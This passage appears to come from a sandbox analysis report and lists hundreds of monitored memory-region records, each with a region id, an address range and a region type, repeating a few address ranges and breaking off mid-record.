region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6493 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6494 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6495 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6496 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6497 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6498 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6499 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6500 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6501 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6502 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6503 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6504 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6505 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6506 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6507 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6508 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6509 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6510 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6511 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6512 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6513 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6514 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6515 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6516 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6517 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6518 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6519 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6520 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6521 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6522 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6523 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6524 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6525 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6526 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6527 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6528 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6529 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6530 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6531 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6532 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6533 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6534 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6535 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6536 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6537 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6538 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6539 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6540 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6541 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6542 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6543 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6544 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6545 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6546 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6547 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6548 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6549 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6550 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6551 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6552 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6553 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6554 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6555 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6556 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6557 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6558 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6559 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6560 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6561 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6562 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6563 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6564 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6565 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6566 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6567 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6568 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6569 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6570 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6571 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6572 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6573 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6574 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6575 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6576 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6577 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6578 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6579 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6580 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6581 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6582 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6583 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6584 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6585 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6586 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6587 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6588 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6589 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6590 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6591 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6592 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6593 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6594 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6595 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6596 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6597 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6598 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6599 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6600 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6601 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6602 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6603 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6604 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6605 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6606 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6607 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6608 start_va = 0x2860000 end_va = 0x2959fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 6609 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6610 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6611 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6612 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6613 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6614 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6615 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6616 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6617 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6618 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6619 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6620 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6621 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6622 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6623 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6624 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6625 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6626 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6627 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6628 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6629 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6630 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6631 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6632 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6633 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6634 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6635 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6636 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6637 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6638 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6639 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6640 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6641 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6642 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6643 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6644 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6645 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6646 start_va = 0x9bc0000 end_va = 0xa0b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bc0000" filename = "" Region: id = 6647 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6648 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6649 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6650 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6651 start_va = 0x470000 end_va = 0x471fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6652 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6653 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6654 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6655 start_va = 0x400000 end_va = 0x402fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6656 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6657 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6658 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6659 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6660 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6661 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6662 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6663 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6668 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6669 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6670 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6671 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6672 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6673 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6674 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6675 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6676 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6677 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6678 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6679 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6680 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6681 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6682 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6683 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6684 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6685 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6686 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6687 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6688 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6689 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6690 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6691 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6692 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6693 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6694 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6695 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 